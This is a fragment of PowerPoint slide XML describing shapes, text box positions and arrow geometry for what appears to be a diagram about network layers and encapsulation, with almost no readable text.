              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B10AA6B-0F0C-8856-2BEB-6D55E2FBFF22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717416" y="2095298"/>
            <a:ext cx="17030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35" dirty="0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9" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2251E06D-7AB6-D3FE-3433-62E5E1BE9A14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="561410" y="2924355"/>
            <a:ext cx="2543810" cy="815340"/>
            <a:chOff x="540258" y="2993898"/>
            <a:chExt cx="2543810" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="object 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EAA4693-CC8D-EC4E-FC82-BB0B68585736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D1558B64-8544-249D-21E1-D89FB2F2609B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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{103C2F15-27F9-EA94-2E0C-47AEFD157DD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717416" y="3008378"/>
            <a:ext cx="15392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1" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CADE3B40-EB65-2557-F40E-87FB15759C29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="561410" y="3837231"/>
            <a:ext cx="2543810" cy="815340"/>
            <a:chOff x="540258" y="3906774"/>
            <a:chExt cx="2543810" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="object 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3A38B5C-A3A2-71F5-474E-DFA7D3D229A0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8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="26220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="55637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6928" y="92940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399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="759702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="789119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92940" y="808411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1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="789119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="759702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2536628" y="722399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40"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="55637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="26220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2450620" y="6928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0" name="object 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2898183C-1063-AA0B-17A9-6213D7E787EB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40"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="55637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="26220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92940" y="6928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8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="26220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="55637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2536628" y="92940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399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="759702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="789119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2450620" y="808411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1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="789119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="759702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6928" y="722399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2" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68F2AEC0-C1CA-E5A9-1A97-869CBF14B276}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717416" y="3922524"/>
            <a:ext cx="16414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3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3" name="object 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{575EA8A3-BF03-ED0E-E949-5D787C6BC94C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6264217" y="1247954"/>
            <a:ext cx="864235" cy="774700"/>
            <a:chOff x="6243065" y="1317497"/>
            <a:chExt cx="864235" cy="774700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="object 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1C4C1E0-2AE7-1ADC-E73E-B343908D7819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735076" y="774191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="129031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="78813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="37798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="10142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8" name="object 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{058365AC-712A-17C2-4568-17A3C1557168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2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="37798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="78813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="129031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735076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4" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1C98E1C-4E55-0934-9116-251816D5E8B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6403791" y="1492379"/>
            <a:ext cx="554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23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{283AD773-EE2E-D646-EB43-58417538065B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6994213" y="1247954"/>
            <a:ext cx="1056640" cy="774700"/>
            <a:chOff x="6973061" y="1317497"/>
            <a:chExt cx="1056640" cy="77470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1BA8C92D-E899-68C9-3991-FAFA56736511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927100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927100" y="774191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="129031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="78813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="37798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="10142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7F7D30C6-3A91-018B-F898-E9FCAE4A54DC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927100" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="10142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="37798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="78813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="129031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927100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6" name="object 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3F63B71-DA41-BD9F-C509-EF2A7AD56FE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7136454" y="1492379"/>
            <a:ext cx="5918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27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0D38158-399F-C221-C75F-36E7017CEE49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5567749" y="2087679"/>
            <a:ext cx="864235" cy="772795"/>
            <a:chOff x="5546597" y="2157222"/>
            <a:chExt cx="864235" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="object 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EB8E838-57E6-945E-24E8-F4953E8C792F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7" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826388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4" name="object 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B266ED2A-BF99-096F-E26B-AF2888FA4BD6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8" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107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8" name="object 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5A34DE8-13B7-8B9B-CDFB-8886E9E2D8EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5706053" y="2332027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31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{680B43A0-BF35-3F54-505D-A93BB5CC2FC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3225361" y="1286055"/>
            <a:ext cx="576580" cy="3278504"/>
            <a:chOff x="3204209" y="1355598"/>
            <a:chExt cx="576580" cy="3278504"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="object 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13D5FD69-F1BF-03D8-A53E-450D9FA0F687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432053" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144017" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144017" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288036" y="3278124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576072" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="2990088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2" name="object 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{151BC4F0-5D10-D9DF-86E8-4192C7A00F0F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0" y="2990088"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144017" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144017" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576072" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288036" y="3278124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2990088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0" name="object 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F23610A1-4B5A-EE07-9539-29A0E174EE16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3449517" y="1364617"/>
            <a:ext cx="85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35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8132FDD0-4C35-37CF-0AB0-E237B2E8055B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3440373" y="1609142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36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C95A69B6-1F09-7ADC-179C-D0C2C06A2116}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3440373" y="1852982"/>
            <a:ext cx="1454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" indent="-1905" algn="just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w e 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37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19CF4935-C58D-0CBF-49B0-B0B98BA78262}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429197" y="2828596"/>
            <a:ext cx="126364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  <a:p>
            <a:pPr marL="12700" marR="5080" indent="1270"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a y e r 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" name="object 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3753A6D8-B7D3-426B-8AF8-F2CAFD195619}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8121974" y="1290626"/>
            <a:ext cx="576580" cy="3276600"/>
            <a:chOff x="8100822" y="1360169"/>
            <a:chExt cx="576580" cy="3276600"/>
          </a:xfrm>
        </p:grpSpPr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757F13C6-CB99-D312-273A-6ED2532E91BA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8100822" y="1360169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432053" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144018" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144018" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288035" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576072" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="2988564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54B605B0-3099-A027-96B3-FA9A33230AB7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8100822" y="1360169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0" y="2988564"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144018" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144018" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576072" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288035" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2988564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5" name="object 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{270396F5-2812-ED14-E006-74E005BB2A02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8356796" y="1246685"/>
            <a:ext cx="10668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254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 c a p s u l a t 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42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57D10D91-85BE-8732-6E0D-98CAF6C69591}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8356796" y="3929839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43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C580589E-BBDF-F833-43FC-5E6C9D820CD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8356796" y="4173679"/>
            <a:ext cx="106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44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9526151-58D1-075B-F063-BC04EE1DB208}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6302317" y="2087679"/>
            <a:ext cx="864235" cy="772795"/>
            <a:chOff x="6281165" y="2157222"/>
            <a:chExt cx="864235" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="object 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EBB630D-E4CF-7B22-187F-A8E72EEBFB9F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6281165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4" h="772794">
                  <a:moveTo>
                    <a:pt x="735330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9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8" y="772667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735330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8" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826388" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785455" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735330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8" name="object 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{889D9EBC-AF79-52F9-1177-FC2327EFBB62}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6281165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4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9" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78652" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128778" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735330" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785455" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826388" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108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30" y="772667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128778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9" name="object 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB33C25D-71EA-D88B-FC0E-D6C412759D5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6441891" y="2332027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48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66FB3B9D-626C-F896-5484-25472B0D3FAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7032313" y="2087678"/>
            <a:ext cx="1056640" cy="772795"/>
            <a:chOff x="7011161" y="2157221"/>
            <a:chExt cx="1056640" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="object 49">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{857891E5-3F8C-59C6-0BDE-D47FBBC656E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7011161" y="2157221"/>
              <a:ext cx="1056640" cy="772795"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1056640" h="772794">
                  <a:moveTo>
                    <a:pt x="927354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9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9" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78652" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128778" y="772667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927354" y="772667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977479" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018413" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1046011" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1046011" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018413" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977479" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927354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6" name="object 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4F5DA4C-8BDB-1E66-893D-04D387FF70D4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7011161" y="2157221"/>
              <a:ext cx="1056640" cy="772795"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1056640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9" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78652" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128778" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927354" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977479" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018413" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1046011" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1046011" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018413" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
